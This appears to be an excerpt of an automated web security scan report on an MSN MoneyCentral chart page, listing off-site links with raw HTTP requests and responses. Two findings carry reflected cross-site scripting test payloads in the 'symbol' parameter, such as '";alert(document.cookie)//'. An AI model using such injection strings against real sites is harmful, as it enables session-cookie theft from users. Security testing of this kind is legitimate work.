<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.220. http://redacted/investor/charts/chartdl.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/charts/chartdl.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js
http://batstrading.com/
http://bing.com/
http://calendar.live.com/
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://insidemsn.wordpress.com/
http://mail.live.com/
http://mail.live.com/?rru=compose
http://mail.live.com/?rru=contacts
http://mail.live.com/?rru=inbox
http://msn.whitepages.com/
http://msnportalmoney.112.2o7.net/b/ss/msnportalmoney/1/H.1--NS/0
http://myhomeredacted/
http://switch.redcated/action/MSN_enUS_Money
http://www.bing.com/customizeBrowser
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.live.com/live/search/search.xml
http://www.morningstar.com/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.telekurs.com/tkfich_index/tkhoch_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296417173&rver=5.5.4177.0&wp=MBI&wreply=http://moneycentral.redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/charts/chartdl.aspx&Query=symbol=indu22b72%2522%253balert(document.cookie)%252f%252f2badde9cef5&lc=1033&id=229
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://investing.money.redacted/investments/charts?Symbol=indu22b72%22%3balert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 30 Jan 2011 19:52:53 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Length: 24815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296417173&rver=5.5.4177.0&wp=MBI&wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/charts/chartdl.aspx&Query=symbol=indu22b72%2522%253balert(document.cookie)%252f%252f2badde9cef5&lc=1033&id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.221. http://redacted/investor/charts/chartdl.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/charts/chartdl.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js
http://batstrading.com/
http://bing.com/
http://calendar.live.com/
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://insidemsn.wordpress.com/
http://mail.live.com/
http://mail.live.com/?rru=compose
http://mail.live.com/?rru=contacts
http://mail.live.com/?rru=inbox
http://msn.whitepages.com/
http://msnportalmoney.112.2o7.net/b/ss/msnportalmoney/1/H.1--NS/0
http://myhomeredacted/
http://switch.redcated/action/MSN_enUS_Money
http://www.bing.com/customizeBrowser
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.live.com/live/search/search.xml
http://www.morningstar.com/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.telekurs.com/tkfich_index/tkhoch_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296417180&rver=5.5.4177.0&wp=MBI&wreply=http://moneycentral.redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/charts/chartdl.aspx&Query=symbol=indu22b72%2522%253balert(1)%252f%252f2badde9cef5&lc=1033&id=229
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 30 Jan 2011 19:53:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Length: 24731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296417180&rver=5.5.4177.0&wp=MBI&wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/charts/chartdl.aspx&Query=symbol=indu22b72%2522%253balert(1)%252f%252f2badde9cef5&lc=1033&id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.222. http://redacted/investor/charts/chartdl.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/charts/chartdl.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js
http://batstrading.com/
http://bing.com/
http://calendar.live.com/
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://insidemsn.wordpress.com/
http://mail.live.com/
http://mail.live.com/?rru=compose
http://mail.live.com/?rru=contacts
http://mail.live.com/?rru=inbox
http://msn.whitepages.com/
http://msnportalmoney.112.2o7.net/b/ss/msnportalmoney/1/H.1--NS/0
http://myhomeredacted/
http://switch.redcated/action/MSN_enUS_Money
http://www.bing.com/customizeBrowser
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.live.com/live/search/search.xml
http://www.morningstar.com/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.telekurs.com/tkfich_index/tkhoch_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353618&rver=5.5.4177.0&wp=MBI&wreply=http://moneycentral.redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/charts/chartdl.aspx&Query=symbol=&lc=1033&id=229
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /investor/charts/chartdl.aspx?symbol= HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 24661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353618&rver=5.5.4177.0&wp=MBI&wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/charts/chartdl.aspx&Query=symbol=&lc=1033&id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.223. http://redacted/investor/charts/chartdl.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/charts/chartdl.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js
http://batstrading.com/
http://bing.com/
http://calendar.live.com/
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://insidemsn.wordpress.com/
http://mail.live.com/
http://mail.live.com/?rru=compose
http://mail.live.com/?rru=contacts
http://mail.live.com/?rru=inbox
http://msn.whitepages.com/
http://msnportalmoney.112.2o7.net/b/ss/msnportalmoney/1/H.1--NS/0
http://myhomeredacted/
http://switch.redcated/action/MSN_enUS_Money
http://www.bing.com/customizeBrowser
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.live.com/live/search/search.xml
http://www.morningstar.com/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.telekurs.com/tkfich_index/tkhoch_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410680&rver=5.5.4177.0&wp=MBI&wreply=http://moneycentral.redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/charts/chartdl.aspx&Query=symbol=&lc=1033&id=229
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /investor/charts/chartdl.aspx?symbol= HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:04:40 GMT
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 24661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
